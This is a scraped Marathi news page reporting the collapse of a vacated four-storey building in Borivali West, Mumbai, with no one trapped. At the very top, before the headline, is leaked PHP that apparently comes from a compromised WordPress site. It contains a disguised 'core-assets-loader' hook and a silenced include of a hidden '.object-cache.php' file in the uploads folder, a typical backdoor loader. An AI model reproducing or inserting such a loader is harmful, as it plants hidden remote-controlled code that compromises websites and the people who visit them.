add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); मुंबईत चार मजली इमारत कोसळली – SOCH INDIA
Menu

देश
मुंबईत चार मजली इमारत कोसळली

nobanner

आताची मोठी बातमी. बोरिवली पश्चिम भागात चार मजली इमारत कोसळल्याची माहिती समोर आली आहे. इमारतीच्या ढिगाऱ्याखाली अनेक जण अडकल्याची शक्यता वर्तविण्यात आली होती. मात्र, यात कोणीही अडकलेले नाही, असे मुंबई महापालिका प्रशासनाकडून सांगण्यात आले.

बोरिवली पश्चिम येथील साईबाबा नगर येथील गितांजली ही निवासी इमारत कोसळली आहे. या दुर्घटनेनंतर अग्निशमन दलाचे पथक घटनास्थळी दाखल झाले आहे. तसेच 12 ते 15 गाड्या दुर्घटनास्थळी पोहोचल्या आहे. मदतकार्य सुरु करण्यात आले आहे.

दरम्यान, ही इमारत धोकादायक असल्याने ती खाली करण्यात आली होती. त्यामुळे मोठी दुर्घटना टळली आहे. ढिगाऱ्याखाली काहीही नसल्याचे मुंबई पालिका प्रशासनाने सांगितले असून हा ढिगारा लवकरच बाजुला केला जाईल, अशी माहिती दिली.